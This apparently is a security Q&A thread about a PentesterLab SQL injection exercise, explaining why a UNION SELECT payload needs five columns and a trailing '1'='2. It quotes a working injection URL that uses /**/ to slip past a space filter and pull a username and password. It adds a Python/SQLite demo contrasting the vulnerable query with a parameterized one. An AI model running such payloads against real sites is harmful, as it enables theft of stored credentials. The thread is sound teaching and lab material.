I am trying to understand The Pentester Lab challenge here at VulnHub.

After I translated this tutorial into English, at Exercise 2 I was presented with the following SQLi which completes the challenge:

http://pentesterlab/sqli/example2.php?name=root'/**/union/**/select/**/1,(select/**/name/**/from/**/users/**/limit/**/3,1),(select/**/passwd/**/from/**/users/**/limit/**/3,1),4,5/**/and/**/'1'='2

The /**/ is used to bypass the WAF which filters space characters.

The union select 1 part just displays the number 1 circled in red.

The brackets ( ... ) are used syntactically to prevent the DBMS from misunderstanding the limit part, as limit 3,1,select and as limit 3,1,4,5, which would both be incorrect without the brackets.

The limit 3,1 part means after the third result, output the next one, so it gets one name and one password, circled in blue.

Provided my understanding above is correct, I cannot understand why the tutorial author included the 4,5 part, nor why they included the '1'='2 part which evaluates to false?

1 Answer

why they included the '1'='2 part which evaluates to false

$sql .= $_GET["name"]."'";

In the code snippet above, notice that a ' is appended to the end of the $_GET["name"] (which is all being appended to the select command). In the exploit you're providing the closing ' after the name (root), so you need to account for the appended '. You do this by adding the and '1'='2 to the end, so when the ' is appended it is proper syntax. In pseudocode it's equivalent to "In the fifth column I want to put the value of true (5) and false (1=2)", which is false (0). When I tested the exploit it didn't matter whether the and evaluated to true or false. I'm guessing it's to prevent anything unexpected from happening with a true value.

why the tutorial author included the 4,5 part

TL;DR - The union operator in SQL requires the same number of columns from all select statements. The users table has five columns so the union select needs five columns.

The Details

As you can see from this screenshot, the users table in the lab has five columns.

And the query in the php script is selecting all the columns:

$sql = "SELECT * FROM users where name='";
$sql .= $_GET["name"]."'";

The exploit is using a SQL union operator to return additional information. The select after the union must have five columns because the users table has five columns. When you perform a union in SQL:

  • Every SELECT statement within UNION must have the same number of columns.
  • The columns must also have similar data types.
  • The columns in every SELECT statement must also be in the same order.

Reading into it a bit further, the select in the php is populating the first row. The select after the union is populating the second row. It's filling the value '1' in the first column, the username in the second, the password in the third, and the values '4' and '5' in the fourth and fifth column respectively.

References
MySql Union

  • In the first paragraph, I am confused as to why doing AND False (because 1 is not equal to 2) would not cause the whole statement to fail. In programming languages like C, when using AND both sides must evaluate to TRUE. It is weird how it can be either true or false. I do understand it is to resolve the trailing ' symbol, another approach that works is to use two -- (%23%23). That was a very good answer! – questioner Jun 08 '22 at 18:03
  • @questioner it doesn't fail because it's only affecting the fifth column entry and the value it puts there. In MySQL (maybe others), any non-zero number is a boolean true. `5 and '1'='2'` is the same thing as entering `true and false` which returns false e.g. 0 for the value of the 5th column. – kenlukas Jun 08 '22 at 19:08
  • That made perfect sense. If I could actually see the 5th column in that SQL injection then it would contain the number 0, or 1 if I made the statement evaluate to true. You have been such a huge help, I have marked as accepted. – questioner Jun 08 '22 at 20:15
  • Would you have any idea about this other question? https://security.stackexchange.com/questions/262605/why-are-mysql-injections-more-limited-than-ms-sql-attacks – questioner Jun 08 '22 at 20:32
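The two points made in the answer above (the UNION column-count rule, and the fifth column holding the value of `5 and '1'='2'`) can be reproduced end to end. This is an added example, not code from the question, the answer, the tutorial or PentesterLab: it uses Python with an in-memory SQLite database in place of the lab's MySQL, the users table rows and the column names other than name and passwd are constructed, and the payload is the one quoted in the question. The hardened lookup with a bound parameter is shown beside the vulnerable string concatenation.

```python
import sqlite3

# Constructed sample rows standing in for the lab's five-column users table.
USERS = [
    (1, "admin", "p4ssw0rd", "admin@example.test", 1),
    (2, "root", "toor", "root@example.test", 1),
    (3, "alice", "wonderland", "alice@example.test", 0),
    (4, "bob", "builder", "bob@example.test", 0),
]

# The name= value from the question's URL; /**/ stands in for spaces.
PAYLOAD = (
    "root'/**/union/**/select/**/1,"
    "(select/**/name/**/from/**/users/**/limit/**/3,1),"
    "(select/**/passwd/**/from/**/users/**/limit/**/3,1),"
    "4,5/**/and/**/'1'='2"
)

def new_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, name TEXT, passwd TEXT, "
                "email TEXT, is_admin INTEGER)")
    con.executemany("INSERT INTO users VALUES (?,?,?,?,?)", USERS)
    return con

def vulnerable_lookup(con, name):
    """Mirrors the PHP: the value is glued into the SQL and a ' is appended."""
    sql = "SELECT * FROM users where name='" + name + "'"
    return con.execute(sql).fetchall()

def safe_lookup(con, name):
    """Hardened form: the value is bound as a parameter, never parsed as SQL."""
    return con.execute("SELECT * FROM users WHERE name=?", (name,)).fetchall()

def eval_expr(expr):
    """Evaluate a bare SQL expression, e.g. the fifth column's 5 and '1'='2'."""
    return new_db().execute("SELECT " + expr).fetchone()[0]

def demo():
    con = new_db()
    rows = vulnerable_lookup(con, PAYLOAD)            # real root row + injected row
    try:                                              # four columns: UNION is rejected
        vulnerable_lookup(con, "root' union select 1,2,3,4 and '1'='2")
        mismatch = None
    except sqlite3.OperationalError as e:
        mismatch = str(e)
    return rows, mismatch, safe_lookup(con, PAYLOAD)  # bound parameter matches nothing

if __name__ == "__main__":
    print(demo())
```

The injected row comes back as (1, 'bob', 'builder', 4, 0): name and passwd from the LIMIT 3,1 subqueries, and 0 in the fifth column because 5 AND '1'='2' is false, exactly as the answer describes.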